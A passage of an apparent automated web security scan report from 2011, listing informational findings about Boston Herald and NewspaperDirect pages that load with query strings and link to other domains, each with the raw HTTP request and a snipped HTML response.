<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.43. http://bostonherald.com/projects/your_tax_dollars.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.8.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/event_simulate.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMwra&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<input type="button" value="Go" onClick="PayrollTable.setPageNumber(1);PayrollTable.getRows();"> <img id="ajax-loader" style="position: relative; top: 2px; display: none;" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif" />
<a id="clear_results" href="javascript: void(0);" onclick="PayrollTable.initialize();" style="display: none;" >
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://jobsearch.local-jobs.monster.com/Search.aspx?wt.mc_n=hjnpsearch&ch=bostonherald&q=&where=Boston&re=130&cy=us&brd=1">Find Boston Jobs</a>
...[SNIP]...
<h2><a href="http://bostonherald.loveaccess.com/">Personals</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.44. http://bostonherald.com/track/inside_track/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /track/inside_track/view.bg?articleid=1366225&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.32.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.10.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<!-- // END Facebook OpenGraph API //-->


<link rel="alternate" title="The Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1366225&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1366225&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1366225&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1366225&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(3) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Sox gals on the catwalk ...');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0; top: 2px;"/>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/teamstats.aspx?team=028" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/players.aspx?id=4852,pos=C,team=028" >stats</a>
...[SNIP]...
<p><object id="flashObj" width="440" height="294" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="@videoPlayer=1162036314001&playerID=90384043001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwujoDnoZHHOVvr4yXqH2wi5E&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="440" height="294" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1366225&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(3) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
o open photo gallery: Sox wives get fashionable" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=5756','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110916/70b51b_Tek_09162011.jpg" alt="Catherine Panagiotopoulos walks past..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=5756','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110916/stp/30a9ec_091511fashiontf08.jpg" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/track\\Sox wives get fashionable"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/track\\Sox wives get fashionable">Purchase Herald Photos</a>
...[SNIP]...
<div id="embedDiv">


<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/track/inside_track/view/20110907sox_with_heels/"><img src="http://multimedia.heraldinteractive.com/images/20110906/stp/47dc1b_wives_09062011.jpg" alt="Sox with heels" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://jobsearch.local-jobs.monster.com/Search.aspx?wt.mc_n=hjnpsearch&ch=bostonherald&q=&where=Boston&re=130&cy=us&brd=1">Find Boston Jobs</a>
...[SNIP]...
<h2><a href="http://bostonherald.loveaccess.com/">Personals</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.45. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=mynewspapers&brief= HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.2.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 1
Date: Sat, 17 Sep 2011 01:42:17 GMT
Content-Length: 703

<div class='block_center'><div class='cover4'><div class="cover_tools"><a href="/epaper/accountingmyaccount.aspx?subpage=newspaperalerts">Edit</a></div><div class='cover_title_c2'>My Newspapers</div><
...[SNIP]...
<a href="/epaper/accountingmyaccount.aspx?subpage=newspaperalerts">
<img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/pic_custnews.gif" border="0" style="margin-top:3px;">
</a>
...[SNIP]...

17.46. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=newsmix_2&datepos=7&language=en&category=0&count=30&count_2=5&personalization=0&sourcetype=1&transform=&mode=1&width=366.5&settings=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 01:52:05 GMT
Last-Modified: Sat, 17 Sep 2011 01:42:05 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 3
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:42:05 GMT
Content-Length: 27881

<table class="gridTopstories" cellspacing="0" cellpadding="0"><tr><td class="gridTopstories-gridCol-first"><div class="featstory"><div style="height:125px;overflow:hidden;position:relative;"><div clas
...[SNIP]...
<a href="pageview.aspx?issue=10892011091600000051001001&amp;page=10&amp;articleid=3a969a86-06d7-4723-afe7-3491b02dc41b&amp;previewmode=1"><img style="width: 80px;" oncontextmenu="return false" onload="HomePageManager.imgloaded(this)" onerror="HomePageManager.imgloaderror(this)" src="http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b0b16248-06df-438b-8131-c8f666655df0&amp;scale=29&amp;file=10892011091600000051001001&amp;regionkey=Nh%2bWE8oWcobK0MrePGUSow%3d%3d" /></a>
...[SNIP]...
<span class="story_text"><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_4.gif" tooltipId="common.art_rank_4" /> Tom Brady wants Patriots fans all lubed up for Sunday...s game ... and a New York condom company is ready to oblige: NuVo Condoms is sending their spokesguy, reggae singer Bennybwoy Goldis, to Foxboro
...[SNIP]...
<a href="pageview.aspx?issue=10892011091600000051001001&amp;page=1&amp;articleid=e8459750-9218-41e4-8a6d-5bdc7aaad8fa&amp;previewmode=1"><img style="width: 80px;" oncontextmenu="return false" onload="HomePageManager.imgloaded(this)" onerror="HomePageManager.imgloaderror(this)" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=47a9b2b0-91be-400a-8f04-6330867a2c04&amp;scale=11&amp;file=10892011091600000051001001&amp;regionkey=2abXk7wkLUHesN7z0Gy4qg%3d%3d" /></a>
...[SNIP]...
<span class="story_text"><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_4.gif" tooltipId="common.art_rank_4" /> ONE MAN...S INCREDIBLE STORY, Down-and-out Bay Staters are turning themselves into human guinea pigs ... making easy money in a tough economy by subjecting themselves to needles, electrodes and never-
...[SNIP]...
<a href="pageview.aspx?issue=10892011091600000051001001&amp;page=2&amp;articleid=2e916798-aedb-4f95-b2de-278f11844cea&amp;previewmode=1"><img style="width: 80px;" oncontextmenu="return false" onload="HomePageManager.imgloaded(this)" onerror="HomePageManager.imgloaderror(this)" src="http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=0372d482-3eac-4731-91c1-6d8fb500a39e&amp;scale=22&amp;file=10892011091600000051001001&amp;regionkey=V7L77IoAuRhQtwtawQfURw%3d%3d" /></a>
...[SNIP]...
<span class="story_text"><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_4.gif" tooltipId="common.art_rank_4" /> Patricia Donahue doesn...t believe any of it.
Not the nameless woman in Iceland. Not the toll-free call she supposedly made to the FBI. And not the $2 million check the Sons of Hoover quietly sent he
...[SNIP]...
<span class="story_text"><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_3.gif" tooltipId="common.art_rank_3" /> Down but not out, casino critics vowed to mount another attack on a legalized gambling bill that rocketed out of the House by a lopsided vote Wednesday night and could land in the Senate by next week.
...[SNIP]...
<a href="pageview.aspx?issue=10892011091600000051001001&amp;page=4&amp;articleid=8a170259-acc2-4f06-8c6c-c3e960db66f4&amp;previewmode=1"><img style="width: 80px;" oncontextmenu="return false" onload="HomePageManager.imgloaded(this)" onerror="HomePageManager.imgloaderror(this)" src="http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b30ae505-e645-4e9d-97f5-d3684c483773&amp;scale=43&amp;file=10892011091600000051001001&amp;regionkey=78eRpvr2Ttz%2b%2fZOGhxa3mA%3d%3d" /></a>
...[SNIP]...
<span class="story_text"><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_2.gif" tooltipId="common.art_rank_2" /> David Morris has been a human lab rat since 2002. He...s been poked and prodded, he...s swallowed cameras and pills, all in the name of making a buck. Here are a few of the studies he has subjected hi
...[SNIP]...
</span><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_2.gif" tooltipId="common.art_rank_2" /> | <span class="news_source">
...[SNIP]...
</span><img style="vertical-align: middle" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/art_rank2_4.gif" tooltipId="common.art_rank_4" /> | <span class="news_source">
...[SNIP]...

17.47. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=topnews&language=en&count=16&transform= HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
